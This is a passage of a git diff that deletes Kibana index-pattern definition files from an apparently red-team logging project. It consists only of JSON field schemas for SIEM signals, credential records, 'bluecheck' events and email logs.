\"name\":\"tls.client.server_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.client.supported_ciphers\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.curve\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.established\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.next_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.resumed\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.certificate_chain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.issuer\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.ja3s\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_after\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.not_before\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.server.subject\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tls.version_protocol\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"trace.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"transaction.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.extension\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.fragment\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.full\"}}},{\"count\":0,\"name\":\"url.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"url.original\"}}},{\"count\":0,\"name\":\"url.password\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.port\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.query\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.registered_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.scheme\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.top_level_domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"url.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.full_name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.full_name\"}}},{\"count\":0,\"name\":\"user.group.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.group.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}},{\"count\":0,\"name\":\"user_agent.device.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.original.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.original\"}}},{\"count\":0,\"name\":\"user_agent.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.full\"}}},{\"count\":0,\"name\":\"user_agent.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user_agent.os.name\"}}},{\"count\":0,\"name\":\"user_agent.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user_agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vlan.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.classification\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.description.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"vulnerability.description\"}}},{\"count\":0,\"name\":\"vulnerability.enumeration\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.report_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.scanner.vendor\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.base\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.environmental\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.temporal\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.score.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"vulnerability.severity\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true}]", "timeFieldName": "@timestamp", "title": ".siem-signals-*"}, "coreMigrationVersion": "7.16.3", "id": "195a3f00-d04f-11ea-9301-a30a04251ae9", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171872765, 241], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_bluecheck.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_bluecheck.ndjson deleted file mode 100644 index 28c67c82..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_bluecheck.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fieldAttrs": "{\"bluecheck.sectools.Product\":{\"count\":1},\"bluechecktype\":{\"count\":1}}", "fields": "[]", "runtimeFieldMap": "{}", "timeFieldName": "@timestamp", "title": "bluecheck-*", "typeMeta": "{}"}, "coreMigrationVersion": "7.16.3", "id": "972368b0-7b90-11ec-9471-7f985bde469d", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1644504089054, 308], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_credentials.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_credentials.ndjson deleted file mode 100644 index 4959e210..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_credentials.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.ephemeral_id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.ephemeral_id\"}}},{\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.hostname.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.hostname\"}}},{\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.id\"}}},{\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.name.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.name\"}}},{\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.type\"}}},{\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"agent.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"agent.version\"}}},{\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.log.type\"}}},{\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"c2.program.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"c2.program\"}}},{\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.credential.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.credential\"}}},{\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.host.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.host\"}}},{\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.realm.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.realm\"}}},{\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.source\"}}},{\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"creds.username.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"creds.username\"}}},{\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"ecs.version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"ecs.version\"}}},{\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.action.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.action\"}}},{\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.category.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.category\"}}},{\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.dataset.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.dataset\"}}},{\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.kind.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.kind\"}}},{\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.module.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.module\"}}},{\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"event.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"event.type\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.attack_scenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.attack_scenario\"}}},{\"name\":\"infra.log.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infra.log.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infra.log.type\"}}},{\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"input.type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"input.type\"}}},{\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"log.file.path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"log.file.path\"}}},{\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}}]", "timeFieldName": "@timestamp", "title": "credentials-*"}, "coreMigrationVersion": "7.16.3", "id": "credentials", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171858664, 19], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_email.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_email.ndjson deleted file mode 100644 index e35579cc..00000000 --- a/elkserver/docker/redelk-base/redelkinstalldata/redelk_kibana_index-pattern_email.ndjson +++ /dev/null @@ -1 +0,0 @@ -{"attributes": {"fields": 